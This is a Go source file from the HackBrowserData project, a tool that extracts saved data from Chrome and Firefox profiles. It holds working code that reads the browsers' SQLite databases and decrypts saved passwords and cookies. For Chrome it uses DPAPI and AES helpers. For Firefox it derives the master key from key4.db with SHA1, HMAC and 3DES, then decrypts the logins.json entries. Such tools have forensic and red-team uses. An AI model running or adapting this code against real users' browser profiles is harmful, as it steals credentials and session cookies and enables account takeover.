You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
HackBrowserData/core/common.go

697 lines
16 KiB

package core
import (
"bytes"
"crypto/cipher"
"crypto/des"
"crypto/hmac"
"crypto/sha1"
"database/sql"
"encoding/asn1"
"encoding/base64"
"encoding/hex"
"hack-browser-data/log"
"hack-browser-data/utils"
"io"
"io/ioutil"
"os"
"time"
_ "github.com/mattn/go-sqlite3"
"github.com/tidwall/gjson"
)
const (
bookmarkID = "id"
bookmarkAdded = "date_added"
bookmarkUrl = "url"
bookmarkName = "name"
bookmarkType = "type"
bookmarkChildren = "children"
)
var (
FullData = new(BrowserData)
)
type (
BrowserData struct {
LoginDataSlice
BookmarkSlice
CookieMap
HistorySlice
}
LoginDataSlice []loginData
BookmarkSlice []bookmarks
CookieMap map[string][]cookies
HistorySlice []history
loginData struct {
UserName string
encryptPass []byte
encryptUser []byte
Password string
LoginUrl string
CreateDate time.Time
}
bookmarks struct {
ID int64
Name string
Type string
URL string
DateAdded time.Time
}
cookies struct {
Host string
Path string
KeyName string
encryptValue []byte
Value string
IsSecure bool
IsHTTPOnly bool
HasExpire bool
IsPersistent bool
CreateDate time.Time
ExpireDate time.Time
}
history struct {
Title string
Url string
VisitCount int
LastVisitTime time.Time
}
)
func ParseResult(dbname string) {
switch dbname {
case utils.Bookmarks:
parseBookmarks()
case utils.History:
parseHistory()
case utils.Cookies:
parseCookie()
case utils.LoginData:
parseLogin()
case utils.FirefoxCookie:
parseFirefoxCookie()
case utils.FirefoxKey4DB:
parseFirefoxKey4()
case utils.FirefoxData:
parseFirefoxData()
}
}
var bookmarkList BookmarkSlice
func parseBookmarks() {
bookmarks, err := utils.ReadFile(utils.Bookmarks)
defer os.Remove(utils.Bookmarks)
if err != nil {
log.Println(err)
}
r := gjson.Parse(bookmarks)
if r.Exists() {
roots := r.Get("roots")
roots.ForEach(func(key, value gjson.Result) bool {
getBookmarkChildren(value)
return true
})
}
FullData.BookmarkSlice = bookmarkList
}
var queryLogin = `SELECT origin_url, username_value, password_value, date_created FROM logins`
func parseLogin() {
var loginItemList LoginDataSlice
login := loginData{}
loginDB, err := sql.Open("sqlite3", utils.LoginData)
defer os.Remove(utils.LoginData)
defer func() {
if err := loginDB.Close(); err != nil {
log.Println(err)
}
}()
if err != nil {
log.Println(err)
}
err = loginDB.Ping()
rows, err := loginDB.Query(queryLogin)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
for rows.Next() {
var (
url, username, password string
pwd []byte
create int64
)
err = rows.Scan(&url, &username, &pwd, &create)
login = loginData{
UserName: username,
encryptPass: pwd,
LoginUrl: url,
}
if utils.VersionUnder80 {
password, err = utils.DecryptStringWithDPAPI(pwd)
} else {
password, err = utils.DecryptChromePass(pwd)
}
if create > time.Now().Unix() {
login.CreateDate = utils.TimeEpochFormat(create)
} else {
login.CreateDate = utils.TimeStampFormat(create)
}
login.Password = password
if err != nil {
log.Println(err)
}
loginItemList = append(loginItemList, login)
}
FullData.LoginDataSlice = loginItemList
}
var queryCookie = `SELECT name, encrypted_value, host_key, path, creation_utc, expires_utc, is_secure, is_httponly, has_expires, is_persistent FROM cookies`
func parseCookie() {
cookie := cookies{}
cookieMap := make(map[string][]cookies)
cookieDB, err := sql.Open("sqlite3", utils.Cookies)
defer os.Remove(utils.Cookies)
defer func() {
if err := cookieDB.Close(); err != nil {
log.Println(err)
}
}()
if err != nil {
log.Println(err)
}
err = cookieDB.Ping()
rows, err := cookieDB.Query(queryCookie)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
for rows.Next() {
var (
key, host, path, value string
isSecure, isHTTPOnly, hasExpire, isPersistent int
createDate, expireDate int64
encryptValue []byte
)
err = rows.Scan(&key, &encryptValue, &host, &path, &createDate, &expireDate, &isSecure, &isHTTPOnly, &hasExpire, &isPersistent)
cookie = cookies{
KeyName: key,
Host: host,
Path: path,
encryptValue: encryptValue,
IsSecure: utils.IntToBool(isSecure),
IsHTTPOnly: utils.IntToBool(isHTTPOnly),
HasExpire: utils.IntToBool(hasExpire),
IsPersistent: utils.IntToBool(isPersistent),
CreateDate: utils.TimeEpochFormat(createDate),
ExpireDate: utils.TimeEpochFormat(expireDate),
}
// remove prefix 'v10'
if utils.VersionUnder80 {
value, err = utils.DecryptStringWithDPAPI(encryptValue)
} else {
value, err = utils.DecryptChromePass(encryptValue)
}
cookie.Value = value
if _, ok := cookieMap[host]; ok {
cookieMap[host] = append(cookieMap[host], cookie)
} else {
cookieMap[host] = []cookies{cookie}
}
}
FullData.CookieMap = cookieMap
}
var queryHistory = `SELECT url, title, visit_count, last_visit_time FROM urls`
func parseHistory() {
var historyList HistorySlice
h := history{}
historyDB, err := sql.Open("sqlite3", utils.History)
defer os.Remove(utils.History)
defer func() {
if err := historyDB.Close(); err != nil {
log.Println(err)
}
}()
if err != nil {
log.Println(err)
}
err = historyDB.Ping()
rows, err := historyDB.Query(queryHistory)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
for rows.Next() {
var (
url, title string
visitCount int
lastVisitTime int64
)
err := rows.Scan(&url, &title, &visitCount, &lastVisitTime)
h = history{
Url: url,
Title: title,
VisitCount: visitCount,
LastVisitTime: utils.TimeEpochFormat(lastVisitTime),
}
if err != nil {
log.Println(err)
continue
}
historyList = append(historyList, h)
}
FullData.HistorySlice = historyList
}
func getBookmarkChildren(value gjson.Result) (children gjson.Result) {
b := bookmarks{}
b.ID = value.Get(bookmarkID).Int()
nodeType := value.Get(bookmarkType)
b.DateAdded = utils.TimeEpochFormat(value.Get(bookmarkAdded).Int())
b.URL = value.Get(bookmarkUrl).String()
b.Name = value.Get(bookmarkName).String()
children = value.Get(bookmarkChildren)
if nodeType.Exists() {
b.Type = nodeType.String()
bookmarkList = append(bookmarkList, b)
if children.Exists() && children.IsArray() {
for _, v := range children.Array() {
children = getBookmarkChildren(v)
}
}
}
return children
}
var queryFirefoxBookMarks = `SELECT id, fk, type, dateAdded, title FROM moz_bookmarks`
var queryFirefoxHistory = `SELECT id, url, title, last_visit_date, visit_count FROM moz_places`
// places.sqlite doc @https://developer.mozilla.org/en-US/docs/Mozilla/Tech/Places/Database
func parseFirefoxData() {
var historyList HistorySlice
var (
err error
keyDB *sql.DB
bookmarkRows, historyRows *sql.Rows
tempMap map[int64]string
bookmarkUrl string
)
tempMap = make(map[int64]string)
keyDB, err = sql.Open("sqlite3", utils.FirefoxData)
defer os.Remove(utils.FirefoxData)
defer func() {
err := keyDB.Close()
if err != nil {
log.Error(err)
}
}()
if err != nil {
log.Error(err)
}
historyRows, err = keyDB.Query(queryFirefoxHistory)
if err != nil {
log.Error(err)
}
defer func() {
if err := historyRows.Close(); err != nil {
log.Error(err)
}
}()
for historyRows.Next() {
var (
id, visitDate int64
url, title string
visitCount int
)
err = historyRows.Scan(&id, &url, &title, &visitDate, &visitCount)
historyList = append(historyList, history{
Title: title,
Url: url,
VisitCount: visitCount,
LastVisitTime: utils.TimeStampFormat(visitDate / 1000000),
})
tempMap[id] = url
}
FullData.HistorySlice = historyList
bookmarkRows, err = keyDB.Query(queryFirefoxBookMarks)
defer func() {
if err := bookmarkRows.Close(); err != nil {
log.Error(err)
}
}()
for bookmarkRows.Next() {
var (
id, fk, bType, dateAdded int64
title string
)
err = bookmarkRows.Scan(&id, &fk, &bType, &dateAdded, &title)
if url, ok := tempMap[id]; ok {
bookmarkUrl = url
}
bookmarkList = append(bookmarkList, bookmarks{
ID: id,
Name: title,
Type: utils.BookMarkType(bType),
URL: bookmarkUrl,
DateAdded: utils.TimeStampFormat(dateAdded / 1000000),
})
}
FullData.BookmarkSlice = bookmarkList
}
var queryPassword = `SELECT item1, item2 FROM metaData WHERE id = 'password'`
func checkKey1() (b [][]byte) {
var (
err error
keyDB *sql.DB
rows *sql.Rows
)
keyDB, err = sql.Open("sqlite3", utils.FirefoxKey4DB)
defer func() {
if err := keyDB.Close(); err != nil {
log.Error(err)
}
}()
if err != nil {
log.Println(err)
}
err = keyDB.Ping()
rows, err = keyDB.Query(queryPassword)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
for rows.Next() {
var (
item1, item2 []byte
)
if err := rows.Scan(&item1, &item2); err != nil {
log.Error(err)
continue
}
b = append(b, item1, item2)
}
return b
}
var queryNssPrivate = `SELECT a11, a102 from nssPrivate;`
func checkA102() (b [][]byte) {
keyDB, err := sql.Open("sqlite3", utils.FirefoxKey4DB)
defer func() {
if err := os.Remove(utils.FirefoxKey4DB); err != nil {
log.Error(err)
}
}()
defer func(closer io.Closer) {
if err := keyDB.Close(); err != nil {
log.Error(err)
}
}(keyDB)
if err != nil {
log.Error(err)
}
rows, err := keyDB.Query(queryNssPrivate)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
for rows.Next() {
var (
a11, a102 []byte
)
if err := rows.Scan(&a11, &a102); err != nil {
log.Println(err)
}
b = append(b, a11, a102)
}
return b
}
/*
ASN1 PBE Structures
SEQUENCE (2 elem)
SEQUENCE (2 elem)
OBJECT IDENTIFIER
SEQUENCE (2 elem)
OCTET STRING (20 byte)
INTEGER 1
OCTET STRING (16 byte)
*/
type PBEAlgorithms struct {
SequenceA
CipherText []byte
}
type SequenceA struct {
DecryptMethod asn1.ObjectIdentifier
SequenceB
}
type SequenceB struct {
EntrySalt []byte
Len int
}
/*
SEQUENCE (3 elem)
OCTET STRING (16 byte)
SEQUENCE (2 elem)
OBJECT IDENTIFIER 1.2.840.113549.3.7 des-EDE3-CBC (RSADSI encryptionAlgorithm)
OCTET STRING (8 byte)
OCTET STRING (16 byte)
*/
type PasswordAsn1 struct {
CipherText []byte
SequenceIV
Encrypted []byte
}
type SequenceIV struct {
asn1.ObjectIdentifier
Iv []byte
}
func decryptPBE(decodeItem []byte) (pbe PBEAlgorithms) {
_, err := asn1.Unmarshal(decodeItem, &pbe)
if err != nil {
log.Error(err)
}
return
}
func parseFirefoxKey4() {
h1 := checkKey1()
globalSalt := h1[0]
decodedItem := h1[1]
keyLin := []byte{248, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1}
pbe := decryptPBE(decodedItem)
m := checkPassword(globalSalt, pbe.EntrySalt, pbe.CipherText)
var finallyKey []byte
if bytes.Contains(m, []byte("password-check")) {
log.Println("password-check success")
h2 := checkA102()
a11 := h2[0]
a102 := h2[1]
m := bytes.Compare(a102, keyLin)
if m == 0 {
pbe2 := decryptPBE(a11)
log.Debugf("decrypt asn1 pbe success")
finallyKey = checkPassword(globalSalt, pbe2.EntrySalt, pbe2.CipherText)[:24]
log.Debugf("finally key", finallyKey, hex.EncodeToString(finallyKey))
}
}
allLogins := GetLoginData()
for _, v := range allLogins {
log.Warn(hex.EncodeToString(v.encryptUser))
s1 := decryptLogin(v.encryptUser)
log.Warn(hex.EncodeToString(v.encryptPass))
s2 := decryptLogin(v.encryptPass)
log.Println(s1, s1.CipherText, s1.Encrypted, s1.Iv)
block, err := des.NewTripleDESCipher(finallyKey)
if err != nil {
log.Println(err)
}
blockMode := cipher.NewCBCDecrypter(block, s1.Iv)
sq := make([]byte, len(s1.Encrypted))
blockMode.CryptBlocks(sq, s1.Encrypted)
blockMode2 := cipher.NewCBCDecrypter(block, s2.Iv)
sq2 := make([]byte, len(s2.Encrypted))
blockMode2.CryptBlocks(sq2, s2.Encrypted)
FullData.LoginDataSlice = append(FullData.LoginDataSlice, loginData{
LoginUrl: v.LoginUrl,
UserName: string(utils.PKCS5UnPadding(sq)),
Password: string(utils.PKCS5UnPadding(sq2)),
CreateDate: v.CreateDate,
})
}
}
var queryFirefoxCookie = `SELECT name, value, host, path, creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies`
func parseFirefoxCookie() {
cookie := cookies{}
cookieMap := make(map[string][]cookies)
cookieDB, err := sql.Open("sqlite3", utils.FirefoxCookie)
defer os.Remove(utils.FirefoxCookie)
defer func() {
if err := cookieDB.Close(); err != nil {
log.Println(err)
}
}()
if err != nil {
log.Println(err)
}
err = cookieDB.Ping()
rows, err := cookieDB.Query(queryFirefoxCookie)
defer func() {
if err := rows.Close(); err != nil {
log.Println(err)
}
}()
for rows.Next() {
var (
name, value, host, path string
isSecure, isHttpOnly int
creationTime, expiry int64
)
err = rows.Scan(&name, &value, &host, &path, &creationTime, &expiry, &isSecure, &isHttpOnly)
cookie = cookies{
KeyName: name,
Host: host,
Path: path,
IsSecure: utils.IntToBool(isSecure),
IsHTTPOnly: utils.IntToBool(isHttpOnly),
CreateDate: utils.TimeStampFormat(creationTime / 1000000),
ExpireDate: utils.TimeStampFormat(expiry),
}
cookie.Value = value
if _, ok := cookieMap[host]; ok {
cookieMap[host] = append(cookieMap[host], cookie)
} else {
cookieMap[host] = []cookies{cookie}
}
}
FullData.CookieMap = cookieMap
}
func checkPassword(globalSalt, entrySalt, encryptText []byte) []byte {
//byte[] GLMP; // GlobalSalt + MasterPassword
//byte[] HP; // SHA1(GLMP)
//byte[] HPES; // HP + EntrySalt
//byte[] CHP; // SHA1(HPES)
//byte[] PES; // EntrySalt completed to 20 bytes by zero
//byte[] PESES; // PES + EntrySalt
//byte[] k1;
//byte[] tk;
//byte[] k2;
//byte[] k; // final value conytaining key and iv
sha1.New()
hp := sha1.Sum(globalSalt)
log.Warn(hex.EncodeToString(hp[:]))
log.Println(len(entrySalt))
s := append(hp[:], entrySalt...)
log.Warn(hex.EncodeToString(s))
chp := sha1.Sum(s)
log.Warn(hex.EncodeToString(chp[:]))
pes := paddingZero(entrySalt, 20)
tk := hmac.New(sha1.New, chp[:])
tk.Write(pes)
pes = append(pes, entrySalt...)
log.Warn(hex.EncodeToString(pes))
k1 := hmac.New(sha1.New, chp[:])
k1.Write(pes)
log.Warn(hex.EncodeToString(k1.Sum(nil)))
log.Warn(hex.EncodeToString(tk.Sum(nil)))
tkPlus := append(tk.Sum(nil), entrySalt...)
k2 := hmac.New(sha1.New, chp[:])
k2.Write(tkPlus)
log.Warn(hex.EncodeToString(k2.Sum(nil)))
k := append(k1.Sum(nil), k2.Sum(nil)...)
iv := k[len(k)-8:]
key := k[:24]
log.Warn("key=", hex.EncodeToString(key), "iv=", hex.EncodeToString(iv))
block, err := des.NewTripleDESCipher(key)
if err != nil {
log.Println(err)
}
blockMode := cipher.NewCBCDecrypter(block, iv)
sq := make([]byte, len(encryptText))
blockMode.CryptBlocks(sq, encryptText)
return sq
}
func paddingZero(s []byte, l int) []byte {
h := l - len(s)
if h <= 0 {
return s
} else {
for i := len(s); i < l; i++ {
s = append(s, 0)
}
return s
}
}
func GetLoginData() (l []loginData) {
s, err := ioutil.ReadFile(utils.FirefoxLoginData)
if err != nil {
log.Warn(err)
}
defer os.Remove(utils.FirefoxLoginData)
h := gjson.GetBytes(s, "logins")
if h.Exists() {
for _, v := range h.Array() {
var (
m loginData
u []byte
p []byte
)
m.LoginUrl = v.Get("formSubmitURL").String()
u, err = base64.StdEncoding.DecodeString(v.Get("encryptedUsername").String())
m.encryptUser = u
if err != nil {
log.Println(err)
}
p, err = base64.StdEncoding.DecodeString(v.Get("encryptedPassword").String())
m.encryptPass = p
m.CreateDate = utils.TimeStampFormat(v.Get("timeCreated").Int() / 1000)
l = append(l, m)
}
}
return
}
func decryptLogin(s []byte) (pbe PasswordAsn1) {
_, err := asn1.Unmarshal(s, &pbe)
if err != nil {
log.Println(err)
}
return pbe
}